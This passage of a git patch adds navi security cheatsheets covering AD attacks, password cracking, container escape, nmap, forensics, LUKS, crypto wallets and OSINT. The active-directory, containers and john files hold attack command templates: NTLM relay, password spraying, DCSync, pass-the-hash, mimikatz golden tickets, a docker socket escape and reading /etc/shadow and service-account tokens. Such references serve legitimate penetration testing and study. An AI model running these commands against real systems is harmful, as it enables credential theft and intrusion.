From 0fc9b49c22894ea3c41e62c6a53b356164155111 Mon Sep 17 00:00:00 2001
From: rpriven <rob.pratt@tutanota.com>
Date: Sun, 4 Jan 2026 15:05:38 -0700
Subject: [PATCH] Initial cypherpunk-cheats collection: 22 navi cheatsheets

---
 .gitignore             |  14 +++++
 LICENSE                |  21 +++++++
 README.md              | 104 ++++++++++++++++++++++++++++++++
 active-directory.cheat |  75 +++++++++++++++++++++++
 bitcoin.cheat          | 132 ++++++++++++++++++++++++++++++++++++++++
 containers.cheat       |  67 +++++++++++++++++++++
 forensics.cheat        |  97 +++++++++++++++++++++++++++++
 hashcat.cheat          |  50 +++++++++++++++
 john.cheat             |  58 ++++++++++++++++++
 luks.cheat             | 124 ++++++++++++++++++++++++++++++++++++++
 monero.cheat           | 121 +++++++++++++++++++++++++++++++++++++
 nmap.cheat             |  53 ++++++++++++++++
 osint.cheat            | 106 ++++++++++++++++++++++++++++++++
 pass.cheat             | 134 +++++++++++++++++++++++++++++++++++++++++
 privacy.cheat          | 128 +++++++++++++++++++++++++++++++++++++++
 privesc-linux.cheat    |  71 ++++++++++++++++++++++
 privesc-windows.cheat  |  83 +++++++++++++++++++++++++
 reversing.cheat        | 127 ++++++++++++++++++++++++++++++++++++++
 secure-comms.cheat     | 129 +++++++++++++++++++++++++++++++++++++++
 solidity.cheat         | 129 +++++++++++++++++++++++++++++++++++++++
 steganography.cheat    | 117 +++++++++++++++++++++++++++++++++++
 tunnels.cheat          | 114 +++++++++++++++++++++++++++++++++++
 web.cheat              |  59 ++++++++++++++++++
 wireless.cheat         |  89 +++++++++++++++++++++++++++
 wireshark.cheat        |  94 +++++++++++++++++++++++++++++
 25 files changed, 2296 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 LICENSE
 create mode 100644 README.md
 create mode 100644 active-directory.cheat
 create mode 100644 bitcoin.cheat
 create mode 100644 containers.cheat
 create mode 100644 forensics.cheat
 create mode 100644 hashcat.cheat
 create mode 100644 john.cheat
 create mode 100644 luks.cheat
 create mode 100644 monero.cheat
 create mode 100644 nmap.cheat
 create mode 100644 osint.cheat
 create mode 100644 pass.cheat
 create mode 100644 privacy.cheat
 create mode 100644 privesc-linux.cheat
 create mode 100644 privesc-windows.cheat
 create mode 100644 reversing.cheat
 create mode 100644 secure-comms.cheat
 create mode 100644 solidity.cheat
 create mode 100644 steganography.cheat
 create mode 100644 tunnels.cheat
 create mode 100644 web.cheat
 create mode 100644 wireless.cheat
 create mode 100644 wireshark.cheat

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..98cf01f
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,14 @@
+# OS
+.DS_Store
+Thumbs.db
+
+# Editors
+*.swp
+*.swo
+*~
+.vscode/
+.idea/
+
+# Temp files
+*.tmp
+*.bak
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..d0b0e61
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 rpriven
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..66d6f0f
--- /dev/null
+++ b/README.md
@@ -0,0 +1,104 @@
+# Cypherpunk Cheats
+
+Navi-compatible cheatsheets for security, privacy, and digital sovereignty.
+
+## Installation
+
+```bash
+# Install navi
+cargo install navi
+
+# Or via package manager
+sudo apt install navi  # Debian/Ubuntu
+brew install navi      # macOS
+
+# Add this repo to navi (choose one)
+navi repo add https://github.com/rpriven/cypherpunk-cheats        # GitHub
+navi repo add https://git.djeditech.com/djedi/cypherpunk-cheats   # Mirror
+```
+
+## Manual Setup
+
+Add to your navi config (`~/.config/navi/config.yaml`):
+
+```yaml
+cheats:
+  paths:
+    - /path/to/cypherpunk-cheats
+```
+
+## Usage
+
+```bash
+# Launch navi
+navi
+
+# Query specific topic
+navi --query "nmap"
+navi --query "monero"
+navi --query "luks"
+
+# Preview mode
+navi --preview
+
+# Use with custom path
+navi --path /path/to/cypherpunk-cheats
+```
+
+## Categories
+
+### Offensive Security
+| File | Description |
+|------|-------------|
+| `nmap.cheat` | Port scanning and service enumeration |
+| `web.cheat` | Web application testing (ffuf, sqlmap, nikto) |
+| `hashcat.cheat` | Password cracking with Hashcat |
+| `john.cheat` | John the Ripper password cracking |
+| `privesc-linux.cheat` | Linux privilege escalation |
+| `privesc-windows.cheat` | Windows privilege escalation |
+| `active-directory.cheat` | AD attacks (NetExec, Kerberoasting) |
+| `containers.cheat` | Docker/Kubernetes security |
+| `wireless.cheat` | WiFi attacks (aircrack-ng, WPA cracking) |
+| `tunnels.cheat` | SSH tunnels, chisel, pivoting |
+
+### DFIR & Analysis
+| File | Description |
+|------|-------------|
+| `forensics.cheat` | Volatility, disk imaging, evidence collection |
+| `osint.cheat` | Sherlock, theHarvester, recon-ng |
+| `wireshark.cheat` | Packet analysis (tshark, tcpdump) |
+| `reversing.cheat` | Ghidra, radare2, GDB, binary analysis |
+| `steganography.cheat` | Hidden data extraction (steghide, binwalk) |
+
+### Privacy & Encryption
+| File | Description |
+|------|-------------|
+| `privacy.cheat` | Tor, GPG, age encryption, metadata removal |
+| `luks.cheat` | Full disk encryption (LUKS, dm-crypt) |
+| `pass.cheat` | Password managers (pass, KeePassXC) |
+| `secure-comms.cheat` | Signal CLI, Matrix, encrypted messaging |
+
+### Cryptocurrency & Web3
+| File | Description |
+|------|-------------|
+| `monero.cheat` | Monero CLI wallet operations |
+| `bitcoin.cheat` | Bitcoin Core CLI operations |
+| `solidity.cheat` | Smart contract auditing (Slither, Foundry) |
+
+## Philosophy
+
+Built for cypherpunks who value:
+- **Privacy** - Default to encrypted, anonymous, and sovereign
+- **Security** - Offensive knowledge for defensive thinking
+- **Freedom** - Tools for digital self-determination
+
+## Contributing
+
+PRs welcome! Follow the navi `.cheat` format:
+- `%` tags for categories
+- `#` comments for descriptions
+- `$` for argument completion
+
+## License
+
+MIT
diff --git a/active-directory.cheat b/active-directory.cheat
new file mode 100644
index 0000000..572ad7f
--- /dev/null
+++ b/active-directory.cheat
@@ -0,0 +1,75 @@
+% ad, active-directory, kerberos, windows, netexec
+
+# Start Responder (LLMNR/NBT-NS poisoning)
+sudo responder -I <interface> -dwPv
+
+# SMB relay attack
+sudo ntlmrelayx.py -tf targets.txt -smb2support
+
+# Get domain users (NetExec - replacement for crackmapexec)
+nxc smb <dc_ip> -u <username> -p <password> --users
+
+# Get domain groups
+nxc smb <dc_ip> -u <username> -p <password> --groups
+
+# Password spray
+nxc smb <dc_ip> -u users.txt -p '<password>' --continue-on-success
+
+# Password spray multiple passwords
+nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
+
+# Kerberoasting - Get TGS tickets
+GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request
+
+# AS-REP Roasting
+GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat
+
+# Dump secrets (admin required)
+secretsdump.py <domain>/<username>:<password>@<target>
+
+# Pass the hash
+psexec.py <domain>/<username>@<target> -hashes <lmhash>:<nthash>
+
+# Pass the hash with NetExec
+nxc smb <target> -u <username> -H <nthash>
+
+# DCSync attack
+secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc
+
+# Get shell with psexec
+psexec.py <domain>/<username>:<password>@<target>
+
+# Get shell with wmiexec
+wmiexec.py <domain>/<username>:<password>@<target>
+
+# Get shell with evil-winrm
+evil-winrm -i <target> -u <username> -p <password>
+
+# BloodHound collection
+bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>
+
+# PowerView - Get domain info
+Import-Module .\PowerView.ps1; Get-Domain
+
+# PowerView - Get domain users
+Get-DomainUser | select samaccountname
+
+# PowerView - Get domain computers
+Get-DomainComputer | select name
+
+# PowerView - Find domain admins
+Get-DomainGroupMember "Domain Admins"
+
+# Golden ticket with mimikatz
+mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"
+
+# Silver ticket
+mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /target:<target> /service:<service> /rc4:<service_hash> /ptt" "exit"
+
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ dc_ip: echo ""
+$ domain: echo ""
+$ username: echo ""
+$ password: echo ""
+$ target: echo ""
+$ nthash: echo ""
diff --git a/bitcoin.cheat b/bitcoin.cheat
new file mode 100644
index 0000000..d5600af
--- /dev/null
+++ b/bitcoin.cheat
@@ -0,0 +1,132 @@
+% bitcoin, btc, cryptocurrency, wallet
+
+# Start Bitcoin daemon
+bitcoind
+
+# Start daemon with options
+bitcoind -daemon -server
+
+# Stop daemon
+bitcoin-cli stop
+
+# Get blockchain info
+bitcoin-cli getblockchaininfo
+
+# Get network info
+bitcoin-cli getnetworkinfo
+
+# Get wallet info
+bitcoin-cli getwalletinfo
+
+# Create new wallet
+bitcoin-cli createwallet "<wallet_name>"
+
+# Load wallet
+bitcoin-cli loadwallet "<wallet_name>"
+
+# List wallets
+bitcoin-cli listwallets
+
+# Generate new address
+bitcoin-cli getnewaddress
+
+# Generate new address with label
+bitcoin-cli getnewaddress "<label>"
+
+# Get balance
+bitcoin-cli getbalance
+
+# List unspent outputs
+bitcoin-cli listunspent
+
+# List transactions
+bitcoin-cli listtransactions
+
+# Get transaction details
+bitcoin-cli gettransaction "<txid>"
+
+# Send to address
+bitcoin-cli sendtoaddress "<address>" <amount>
+
+# Send with fee rate
+bitcoin-cli sendtoaddress "<address>" <amount> "" "" false true null "unset" null <fee_rate>
+
+# Create raw transaction
+bitcoin-cli createrawtransaction '[{"txid":"<txid>","vout":<vout>}]' '{"<address>":<amount>}'
+
+# Sign raw transaction
+bitcoin-cli signrawtransactionwithwallet "<hex>"
+
+# Send raw transaction
+bitcoin-cli sendrawtransaction "<hex>"
+
+# Estimate fee (blocks to confirm)
+bitcoin-cli estimatesmartfee <blocks>
+
+# Dump private key (WIF)
+bitcoin-cli dumpprivkey "<address>"
+
+# Import private key
+bitcoin-cli importprivkey "<wif_key>"
+
+# Backup wallet
+bitcoin-cli backupwallet "<backup_path>"
+
+# Encrypt wallet
+bitcoin-cli encryptwallet "<passphrase>"
+
+# Unlock wallet (seconds)
+bitcoin-cli walletpassphrase "<passphrase>" <timeout>
+
+# Lock wallet
+bitcoin-cli walletlock
+
+# Get block hash
+bitcoin-cli getblockhash <height>
+
+# Get block data
+bitcoin-cli getblock "<blockhash>"
+
+# Decode raw transaction
+bitcoin-cli decoderawtransaction "<hex>"
+
+# Verify message signature
+bitcoin-cli verifymessage "<address>" "<signature>" "<message>"
+
+# Sign message
+bitcoin-cli signmessage "<address>" "<message>"
+
+# Sparrow Wallet (GUI - recommended)
+sparrow
+
+# Electrum (lightweight wallet)
+electrum
+
+# Hardware wallet - Trezor
+trezorctl list
+trezorctl get-address -n "m/84'/0'/0'/0/0"
+
+# Hardware wallet - Ledger
+# Use Ledger Live or HWI
+
+# Bitcoin Core config (~/.bitcoin/bitcoin.conf)
+# server=1
+# rpcuser=user
+# rpcpassword=pass
+# txindex=1
+
+$ wallet_name: bitcoin-cli listwallets 2>/dev/null | jq -r '.[]' 2>/dev/null
+$ label: echo "main"
+$ txid: echo ""
+$ address: echo ""
+$ amount: echo "0.001"
+$ fee_rate: echo "10"
+$ vout: echo "0"
+$ hex: echo ""
+$ wif_key: echo ""
+$ backup_path: echo "wallet_backup.dat"
+$ passphrase: echo ""
+$ timeout: echo "60"
+$ height: echo "0"
+$ blockhash: echo ""
+$ blocks: echo "6"
diff --git a/containers.cheat b/containers.cheat
new file mode 100644
index 0000000..3a2cd49
--- /dev/null
+++ b/containers.cheat
@@ -0,0 +1,67 @@
+% docker, kubernetes, containers, escape
+
+# Check if inside container
+ls -la /.dockerenv
+cat /proc/1/cgroup | grep docker
+
+# List docker images
+docker images
+
+# List running containers
+docker ps
+
+# List all containers
+docker ps -a
+
+# Execute into container
+docker exec -it <container_id> /bin/bash
+
+# Inspect container
+docker inspect <container_id>
+
+# Docker socket escape (if socket mounted)
+docker run -v /:/hostfs -it alpine chroot /hostfs
+
+# Privileged container escape - mount host
+mkdir /mnt/host && mount /dev/sda1 /mnt/host
+
+# Check capabilities
+capsh --print
+
+# Kubernetes - get pods
+kubectl get pods
+
+# Kubernetes - get all namespaces
+kubectl get namespaces
+
+# Kubernetes - get pods all namespaces
+kubectl get pods --all-namespaces
+
+# Kubernetes - get secrets
+kubectl get secrets
+
+# Kubernetes - decode secret
+kubectl get secret <secret_name> -o yaml
+
+# Kubernetes - exec into pod
+kubectl exec -it <pod_name> -- /bin/bash
+
+# Get service account token
+cat /var/run/secrets/kubernetes.io/serviceaccount/token
+
+# Check RBAC permissions
+kubectl auth can-i --list
+
+# Trivy - scan image
+trivy image <image_name>
+
+# Deepce - Docker enumeration
+./deepce.sh
+
+# CDK - container pentest toolkit
+./cdk evaluate
+
+$ container_id: docker ps --format "{{.ID}}\t{{.Names}}" 2>/dev/null
+$ pod_name: kubectl get pods --no-headers 2>/dev/null | awk '{print $1}'
+$ secret_name: kubectl get secrets --no-headers 2>/dev/null | awk '{print $1}'
+$ image_name: docker images --format "{{.Repository}}:{{.Tag}}" 2>/dev/null
diff --git a/forensics.cheat b/forensics.cheat
new file mode 100644
index 0000000..93bddf6
--- /dev/null
+++ b/forensics.cheat
@@ -0,0 +1,97 @@
+% forensics, dfir, volatility, memory, incident-response
+
+# Volatility 3 - identify OS
+vol -f <memory_dump> windows.info
+
+# Volatility 3 - process list
+vol -f <memory_dump> windows.pslist
+
+# Volatility 3 - process tree
+vol -f <memory_dump> windows.pstree
+
+# Volatility 3 - hidden processes
+vol -f <memory_dump> windows.psscan
+
+# Volatility 3 - network connections
+vol -f <memory_dump> windows.netscan
+
+# Volatility 3 - command line history
+vol -f <memory_dump> windows.cmdline
+
+# Volatility 3 - DLLs for process
+vol -f <memory_dump> windows.dlllist --pid <pid>
+
+# Volatility 3 - malware detection
+vol -f <memory_dump> windows.malfind
+
+# Volatility 3 - registry hives
+vol -f <memory_dump> windows.registry.hivelist
+
+# Volatility 3 - dump process memory
+vol -f <memory_dump> windows.memmap --pid <pid> --dump
+
+# Volatility 2 - image info (legacy)
+volatility -f <memory_dump> imageinfo
+
+# Volatility 2 - with profile
+volatility -f <memory_dump> --profile=<profile> pslist
+
+# Disk imaging with dd
+sudo dd if=<source_device> of=<output_file> bs=64K conv=noerror,sync status=progress
+
+# Disk imaging with dcfldd (forensic)
+sudo dcfldd if=<source_device> of=<output_file> hash=md5,sha256 hashlog=hashes.txt
+
+# Mount forensic image read-only
+sudo mount -o ro,loop,noexec <image_file> <mount_point>
+
+# Mount with offset (partition)
+sudo mount -o ro,loop,offset=$((512*<sector_offset>)) <image_file> <mount_point>
+
+# File carving with foremost
+foremost -i <image_file> -o <output_dir>
+
+# File recovery with photorec
+photorec <image_file>
+
+# File recovery with scalpel
+scalpel -c /etc/scalpel/scalpel.conf -o <output_dir> <image_file>
+
+# Timeline with plaso
+log2timeline.py <output.plaso> <evidence_source>
+
+# Parse plaso timeline
+psort.py -o l2tcsv <output.plaso> -w timeline.csv
+
+# Extract strings from binary
+strings -n 8 <file>
+strings -e l <file>
+
+# Calculate file hashes
+md5sum <file> && sha256sum <file>
+
+# Chainsaw - Windows event log hunting
+chainsaw hunt <evtx_dir> --rules <sigma_rules_dir>
+
+# Parse Windows prefetch
+PECmd.exe -d C:\Windows\Prefetch --csv <output_dir>
+
+# Registry analysis with RegRipper
+rip.pl -r <registry_hive> -p all
+
+# KAPE collection
+kape.exe --tsource C: --tdest <output_dir> --target !SANS_Triage
+
+# Autopsy (GUI forensics)
+autopsy
+
+$ memory_dump: find . -name "*.raw" -o -name "*.mem" -o -name "*.dmp" 2>/dev/null
+$ source_device: lsblk -dpno NAME | head -5
+$ output_file: echo "disk.raw"
+$ image_file: find . -name "*.raw" -o -name "*.dd" -o -name "*.img" 2>/dev/null
+$ mount_point: echo "/mnt/evidence"
+$ output_dir: echo "output"
+$ pid: echo ""
+$ profile: echo "Win10x64_19041"
+$ sector_offset: echo "2048"
+$ evtx_dir: echo "/path/to/evtx"
diff --git a/hashcat.cheat b/hashcat.cheat
new file mode 100644
index 0000000..62402d0
--- /dev/null
+++ b/hashcat.cheat
@@ -0,0 +1,50 @@
+% hashcat, cracking, passwords
+
+# Crack MD5 hash
+hashcat -m 0 <hashfile> <wordlist> -O
+
+# Crack NTLM hash
+hashcat -m 1000 <hashfile> <wordlist> -O
+
+# Crack NTLMv2 (Responder capture)
+hashcat -m 5600 <hashfile> <wordlist> -O
+
+# Crack SHA-512 Linux ($6$)
+hashcat -m 1800 <hashfile> <wordlist> -O
+
+# Crack Kerberoasting TGS
+hashcat -m 13100 <hashfile> <wordlist> -O
+
+# Crack AS-REP Roast
+hashcat -m 18200 <hashfile> <wordlist> -O
+
+# Crack WPA2
+hashcat -m 22000 <hashfile> <wordlist> -O
+
+# Crack bcrypt
+hashcat -m 3200 <hashfile> <wordlist> -O
+
+# Crack JWT
+hashcat -m 16500 <hashfile> <wordlist> -O
+
+# With rules (best64)
+hashcat -m <mode> <hashfile> <wordlist> -r /usr/share/hashcat/rules/best64.rule -O
+
+# Mask attack - 4 digits
+hashcat -m <mode> <hashfile> -a 3 ?d?d?d?d
+
+# Mask attack - 8 lowercase
+hashcat -m <mode> <hashfile> -a 3 ?l?l?l?l?l?l?l?l
+
+# Mask attack - Password1! pattern
+hashcat -m <mode> <hashfile> -a 3 ?u?l?l?l?l?l?l?l?d?s
+
+# Show cracked passwords
+hashcat -m <mode> <hashfile> --show
+
+# Resume session
+hashcat --restore
+
+$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ mode: echo "0\n100\n1000\n1400\n1700\n1800\n3200\n5600\n13100\n18200" --- --header "Mode: 0=MD5, 100=SHA1, 1000=NTLM, 1400=SHA256, 1700=SHA512, 1800=sha512crypt, 3200=bcrypt, 5600=NTLMv2, 13100=Kerberoast, 18200=AS-REP"
diff --git a/john.cheat b/john.cheat
new file mode 100644
index 0000000..0b21ceb
--- /dev/null
+++ b/john.cheat
@@ -0,0 +1,58 @@
+% john, cracking, passwords
+
+# Auto-detect and crack
+john <hashfile>
+
+# Crack with wordlist
+john --wordlist=<wordlist> <hashfile>
+
+# Crack NTLM
+john --format=nt --wordlist=<wordlist> <hashfile>
+
+# Crack MD5
+john --format=raw-md5 --wordlist=<wordlist> <hashfile>
+
+# Crack SHA-512 Linux
+john --format=sha512crypt --wordlist=<wordlist> <hashfile>
+
+# Crack bcrypt
+john --format=bcrypt --wordlist=<wordlist> <hashfile>
+
+# Show cracked passwords
+john --show <hashfile>
+
+# With rules
+john --wordlist=<wordlist> --rules <hashfile>
+
+# SSH key crack
+ssh2john <ssh_key> > ssh_hash.txt && john --wordlist=<wordlist> ssh_hash.txt
+
+# ZIP file crack
+zip2john <zip_file> > zip_hash.txt && john --wordlist=<wordlist> zip_hash.txt
+
+# RAR file crack
+rar2john <rar_file> > rar_hash.txt && john --wordlist=<wordlist> rar_hash.txt
+
+# PDF crack
+pdf2john <pdf_file> > pdf_hash.txt && john --wordlist=<wordlist> pdf_hash.txt
+
+# Office document crack
+office2john <office_file> > office_hash.txt && john --wordlist=<wordlist> office_hash.txt
+
+# KeePass crack
+keepass2john <kdbx_file> > keepass_hash.txt && john --wordlist=<wordlist> keepass_hash.txt
+
+# Linux shadow file
+unshadow /etc/passwd /etc/shadow > unshadowed.txt && john --wordlist=<wordlist> unshadowed.txt
+
+# List available formats
+john --list=formats
+
+$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ ssh_key: find . -name "id_rsa" -o -name "*.pem" 2>/dev/null
+$ zip_file: find . -name "*.zip" 2>/dev/null
+$ rar_file: find . -name "*.rar" 2>/dev/null
+$ pdf_file: find . -name "*.pdf" 2>/dev/null
+$ office_file: find . -name "*.docx" -o -name "*.xlsx" 2>/dev/null
+$ kdbx_file: find . -name "*.kdbx" 2>/dev/null
diff --git a/luks.cheat b/luks.cheat
new file mode 100644
index 0000000..26a88e0
--- /dev/null
+++ b/luks.cheat
@@ -0,0 +1,124 @@
+% luks, encryption, disk, dm-crypt, fde
+
+# Check if device is LUKS
+sudo cryptsetup isLuks <device>
+
+# LUKS info
+sudo cryptsetup luksDump <device>
+
+# Create LUKS volume
+sudo cryptsetup luksFormat <device>
+
+# Create LUKS2 volume (recommended)
+sudo cryptsetup luksFormat --type luks2 <device>
+
+# Create LUKS with specific cipher
+sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 <device>
+
+# Open LUKS volume
+sudo cryptsetup luksOpen <device> <mapper_name>
+
+# Open LUKS (alternative syntax)
+sudo cryptsetup open <device> <mapper_name>
+
+# Close LUKS volume
+sudo cryptsetup luksClose <mapper_name>
+
+# Add key to LUKS
+sudo cryptsetup luksAddKey <device>
+
+# Add key from file
+sudo cryptsetup luksAddKey <device> <keyfile>
+
+# Remove key
+sudo cryptsetup luksRemoveKey <device>
+
+# Kill key slot
+sudo cryptsetup luksKillSlot <device> <slot_number>
+
+# Change passphrase
+sudo cryptsetup luksChangeKey <device>
+
+# Create filesystem on opened LUKS
+sudo mkfs.ext4 /dev/mapper/<mapper_name>
+
+# Mount LUKS volume
+sudo mount /dev/mapper/<mapper_name> <mount_point>
+
+# Unmount LUKS volume
+sudo umount <mount_point>
+sudo cryptsetup luksClose <mapper_name>
+
+# Create encrypted file container
+dd if=/dev/zero of=<container_file> bs=1M count=<size_mb>
+sudo cryptsetup luksFormat <container_file>
+sudo cryptsetup luksOpen <container_file> <mapper_name>
+sudo mkfs.ext4 /dev/mapper/<mapper_name>
+
+# Backup LUKS header
+sudo cryptsetup luksHeaderBackup <device> --header-backup-file <backup_file>
+
+# Restore LUKS header
+sudo cryptsetup luksHeaderRestore <device> --header-backup-file <backup_file>
+
+# Erase LUKS header (DESTROYS DATA!)
+sudo cryptsetup luksErase <device>
+
+# Check LUKS status
+sudo cryptsetup status <mapper_name>
+
+# Benchmark encryption
+cryptsetup benchmark
+
+# Auto-mount with /etc/crypttab
+# <mapper_name> <device> none luks
+
+# Auto-mount with keyfile
+# <mapper_name> <device> <keyfile> luks
+
+# Full disk encryption install (Ubuntu)
+# Select "Encrypt the new Ubuntu installation" during install
+
+# Encrypt home directory (ecryptfs - legacy)
+sudo apt install ecryptfs-utils
+ecryptfs-migrate-home -u <username>
+
+# LUKS on LVM
+sudo pvcreate /dev/mapper/<mapper_name>
+sudo vgcreate <vg_name> /dev/mapper/<mapper_name>
+sudo lvcreate -l 100%FREE -n <lv_name> <vg_name>
+
+# Resize LUKS volume (grow)
+sudo cryptsetup resize <mapper_name>
+sudo resize2fs /dev/mapper/<mapper_name>
+
+# Create encrypted swap
+sudo cryptsetup luksFormat <swap_device>
+sudo cryptsetup luksOpen <swap_device> cryptswap
+sudo mkswap /dev/mapper/cryptswap
+sudo swapon /dev/mapper/cryptswap
+
+# VeraCrypt CLI - create volume
+veracrypt -t -c
+
+# VeraCrypt CLI - mount
+veracrypt <volume_file> <mount_point>
+
+# VeraCrypt CLI - dismount
+veracrypt -d
+
+# VeraCrypt CLI - list mounted
+veracrypt -l
+
+$ device: lsblk -dpno NAME | grep -v loop
+$ mapper_name: ls /dev/mapper 2>/dev/null | grep -v control
+$ mount_point: echo "/mnt/encrypted"
+$ keyfile: echo "/root/keyfile"
+$ backup_file: echo "luks_header.backup"
+$ container_file: echo "encrypted_container.img"
+$ size_mb: echo "1024"
+$ slot_number: echo "0\n1\n2\n3\n4\n5\n6\n7"
+$ username: whoami
+$ vg_name: echo "encrypted_vg"
+$ lv_name: echo "data"
+$ volume_file: find ~ -name "*.hc" -o -name "*.tc" 2>/dev/null | head -5
diff --git a/monero.cheat b/monero.cheat
new file mode 100644
index 0000000..9f1d69a
--- /dev/null
+++ b/monero.cheat
@@ -0,0 +1,121 @@
+% monero, xmr, cryptocurrency, wallet
+
+# Start Monero daemon
+monerod
+
+# Start daemon with remote node (no local blockchain)
+monerod --bootstrap-daemon-address auto
+
+# Start wallet CLI
+monero-wallet-cli
+
+# Create new wallet
+monero-wallet-cli --generate-new-wallet <wallet_name>
+
+# Open existing wallet
+monero-wallet-cli --wallet-file <wallet_file>
+
+# Connect to remote node
+monero-wallet-cli --daemon-address <node_address>
+
+# Restore wallet from seed
+monero-wallet-cli --restore-deterministic-wallet
+
+# Restore from keys
+monero-wallet-cli --generate-from-keys <wallet_name>
+
+# Check balance (in wallet)
+balance
+
+# Check unlocked balance
+balance unlocked
+
+# Get wallet address
+address
+
+# Get all addresses (subaddresses)
+address all
+
+# Create new subaddress
+address new <label>
+
+# Show seed (KEEP SECRET!)
+seed
+
+# Show private keys (KEEP SECRET!)
+spendkey
+viewkey
+
+# Transfer XMR
+transfer <address> <amount>
+
+# Transfer with priority
+transfer <priority> <address> <amount>
+
+# Sweep all to address
+sweep_all <address>
+
+# Show transaction history
+show_transfers
+
+# Show incoming transfers
+show_transfers in
+
+# Show outgoing transfers
+show_transfers out
+
+# Show pending transfers
+show_transfers pending
+
+# Check transaction status
+show_transfer <txid>
+
+# Export outputs (for hardware wallet)
+export_outputs outputs.txt
+
+# Import outputs
+import_outputs outputs.txt
+
+# Export key images
+export_key_images key_images.txt
+
+# Sign message with wallet
+sign <message>
+
+# Verify signed message
+verify <address> <signature> <message>
+
+# Rescan blockchain
+rescan_bc
+
+# Rescan spent outputs
+rescan_spent
+
+# Refresh wallet
+refresh
+
+# Set daemon address
+set_daemon <node_address>
+
+# Check daemon status
+status
+
+# Get fee estimate
+fee
+
+# Stop wallet
+exit
+
+# Public remote nodes (use with caution)
+# node.moneroworld.com:18089
+# nodes.hashvault.pro:18081
+# xmr-node.cakewallet.com:18081
+
+$ wallet_name: echo "my_wallet"
+$ wallet_file: find ~ -name "*.keys" 2>/dev/null | head -5
+$ node_address: echo "node.moneroworld.com:18089"
+$ address: echo ""
+$ amount: echo "0.1"
+$ priority: echo "0\n1\n2\n3\n4" --- --header "0=default, 1=unimportant, 2=normal, 3=elevated, 4=priority"
+$ txid: echo ""
+$ label: echo "donation"
diff --git a/nmap.cheat b/nmap.cheat
new file mode 100644
index 0000000..6aab9e7
--- /dev/null
+++ b/nmap.cheat
@@ -0,0 +1,53 @@
+% nmap, scanning, recon
+
+# Quick SYN scan (top 1000 ports)
+nmap -sS <target>
+
+# Full port scan (all 65535)
+nmap -sS -p- <target>
+
+# Service version detection
+nmap -sV <target>
+
+# OS detection
+nmap -O <target>
+
+# Aggressive scan (OS, version, scripts, traceroute)
+nmap -A <target>
+
+# UDP scan (top ports)
+nmap -sU --top-ports 20 <target>
+
+# Script scan (default scripts)
+nmap -sC <target>
+
+# Vulnerability scan
+nmap --script vuln <target>
+
+# SMB enumeration
+nmap --script smb-enum-shares,smb-enum-users -p 445 <target>
+
+# HTTP enumeration
+nmap --script http-enum -p 80,443 <target>
+
+# Full comprehensive scan
+nmap -sS -sV -sC -O -p- -oA scan_<target> <target>
+
+# Scan multiple targets from file
+nmap -iL <targets_file>
+
+# Fast scan (top 100 ports)
+nmap -F <target>
+
+# Ping sweep (host discovery)
+nmap -sn <network_cidr>
+
+# Skip ping (scan even if host appears down)
+nmap -Pn <target>
+
+# Output all formats
+nmap -sS -sV -oA output_<target> <target>
+
+$ target: echo ""
+$ targets_file: find . -name "*.txt" -type f 2>/dev/null
+$ network_cidr: echo "192.168.1.0/24"
diff --git a/osint.cheat b/osint.cheat
new file mode 100644
index 0000000..0a96d4b
--- /dev/null
+++ b/osint.cheat
@@ -0,0 +1,106 @@
+% osint, recon, reconnaissance, intelligence
+
+# Sherlock - username search
+sherlock <username>
+
+# Sherlock - multiple usernames
+sherlock <username1> <username2> <username3>
+
+# Maigret - username search (better)
+maigret <username>
+
+# theHarvester - all sources
+theHarvester -d <domain> -b all
+
+# theHarvester - specific sources
+theHarvester -d <domain> -b google,linkedin,twitter
+
+# Subfinder - subdomain enumeration
+subfinder -d <domain>
+
+# Subfinder - with output
+subfinder -d <domain> -o subdomains.txt
+
+# Amass - subdomain enum
+amass enum -d <domain>
+
+# Amass - passive only
+amass enum -passive -d <domain>
+
+# Certificate transparency lookup
+curl -s "https://crt.sh/?q=%.<domain>&output=json" | jq -r '.[].name_value' | sort -u
+
+# DNS enumeration
+dig <domain> ANY
+dig <domain> MX
+dig <domain> TXT
+
+# Zone transfer attempt
+dig axfr @<nameserver> <domain>
+
+# Whois lookup
+whois <domain>
+
+# Reverse whois (by email)
+# Use viewdns.info or whoxy.com
+
